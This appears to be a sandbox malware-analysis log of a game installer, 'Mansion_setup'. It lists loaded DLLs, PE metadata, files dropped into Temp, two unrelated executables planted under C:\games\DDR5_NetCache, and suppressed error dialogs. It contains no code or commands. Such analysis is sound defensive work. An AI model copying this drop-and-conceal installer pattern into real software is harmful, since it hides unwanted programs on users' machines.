Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: oleacc.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: msimg32.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: wininet.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: mscoree.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: amsi.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: winhttp.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: webio.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: mswsock.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: winnsi.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: apphelp.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: opengl32.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: userenv.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: version.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: netapi32.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: winmm.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: glu32.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: netutils.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: srvcli.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: wininet.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: mscoree.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: amsi.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: wldp.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: profapi.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exeSection loaded: mpr.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exeSection loaded: mfplat.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exeSection loaded: rtworkq.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exeSection loaded: cryptbase.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exeSection loaded: mswsock.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Mansion_setup (1).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Mansion_setup (1).exeStatic PE information: certificate valid
Source: Mansion_setup (1).exeStatic file information: File size 65780936 > 1048576
Source: Mansion_setup (1).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: elevate.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x225bc
Source: libEGL.dll0.5.drStatic PE information: real checksum: 0x0 should be: 0x7f49d
Source: libEGL.dll.5.drStatic PE information: real checksum: 0x0 should be: 0x7f49d
Source: vulkan-1.dll0.5.drStatic PE information: real checksum: 0x0 should be: 0xe8fc5
Source: nsis7z.dll.5.drStatic PE information: real checksum: 0x0 should be: 0x7611e
Source: vk_swiftshader.dll.5.drStatic PE information: real checksum: 0x0 should be: 0x506829
Source: vk_swiftshader.dll0.5.drStatic PE information: real checksum: 0x0 should be: 0x506829
Source: libGLESv2.dll.5.drStatic PE information: real checksum: 0x0 should be: 0x7202c9
Source: System.dll.5.drStatic PE information: real checksum: 0x0 should be: 0xe5c7
Source: libGLESv2.dll0.5.drStatic PE information: real checksum: 0x0 should be: 0x7202c9
Source: ExtractJPEGcmd.exe.9.drStatic PE information: real checksum: 0x6e862a should be: 0x6e2977
Source: vulkan-1.dll.5.drStatic PE information: real checksum: 0x0 should be: 0xe8fc5
Source: ffmpeg.dll.5.drStatic PE information: real checksum: 0x0 should be: 0x2c5e0e
Source: ffmpeg.dll0.5.drStatic PE information: real checksum: 0x0 should be: 0x2c5e0e
Source: ffmpeg.dll.5.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll.5.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.5.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.5.drStatic PE information: section name: _RDATA
Source: libEGL.dll.5.drStatic PE information: section name: .00cfg
Source: libEGL.dll.5.drStatic PE information: section name: .gxfg
Source: libEGL.dll.5.drStatic PE information: section name: .retplne
Source: libEGL.dll.5.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll.5.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll.5.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.5.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.5.drStatic PE information: section name: _RDATA
Source: Mansion.exe.5.drStatic PE information: section name: .00cfg
Source: Mansion.exe.5.drStatic PE information: section name: .gxfg
Source: Mansion.exe.5.drStatic PE information: section name: .retplne
Source: Mansion.exe.5.drStatic PE information: section name: .rodata
Source: Mansion.exe.5.drStatic PE information: section name: CPADinfo
Source: Mansion.exe.5.drStatic PE information: section name: LZMADEC
Source: Mansion.exe.5.drStatic PE information: section name: _RDATA
Source: Mansion.exe.5.drStatic PE information: section name: malloc_h
Source: vk_swiftshader.dll.5.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll.5.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.5.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.5.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.5.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll.5.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.5.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.5.drStatic PE information: section name: _RDATA
Source: ffmpeg.dll0.5.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll0.5.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll0.5.drStatic PE information: section name: .retplne
Source: ffmpeg.dll0.5.drStatic PE information: section name: _RDATA
Source: libEGL.dll0.5.drStatic PE information: section name: .00cfg
Source: libEGL.dll0.5.drStatic PE information: section name: .gxfg
Source: libEGL.dll0.5.drStatic PE information: section name: .retplne
Source: libEGL.dll0.5.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll0.5.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll0.5.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll0.5.drStatic PE information: section name: .retplne
Source: libGLESv2.dll0.5.drStatic PE information: section name: _RDATA
Source: Mansion.exe0.5.drStatic PE information: section name: .00cfg
Source: Mansion.exe0.5.drStatic PE information: section name: .gxfg
Source: Mansion.exe0.5.drStatic PE information: section name: .retplne
Source: Mansion.exe0.5.drStatic PE information: section name: .rodata
Source: Mansion.exe0.5.drStatic PE information: section name: CPADinfo
Source: Mansion.exe0.5.drStatic PE information: section name: LZMADEC
Source: Mansion.exe0.5.drStatic PE information: section name: _RDATA
Source: Mansion.exe0.5.drStatic PE information: section name: malloc_h
Source: vk_swiftshader.dll0.5.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll0.5.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll0.5.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll0.5.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll0.5.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll0.5.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll0.5.drStatic PE information: section name: .retplne
Source: vulkan-1.dll0.5.drStatic PE information: section name: _RDATA
Source: qtZint.exe.9.drStatic PE information: section name: .qtmetad
Source: qtZint.exe.9.drStatic PE information: section name: _RDATA
Source: qtZint.exe.9.drStatic PE information: section name: .qtmimed
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\Mansion.exeJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeFile created: C:\games\DDR5_NetCache\qtZint.exeJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeFile created: C:\games\DDR5_NetCache\ExtractJPEGcmd.exeJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeFile created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeRegistry key monitored for changes: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SpellingJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
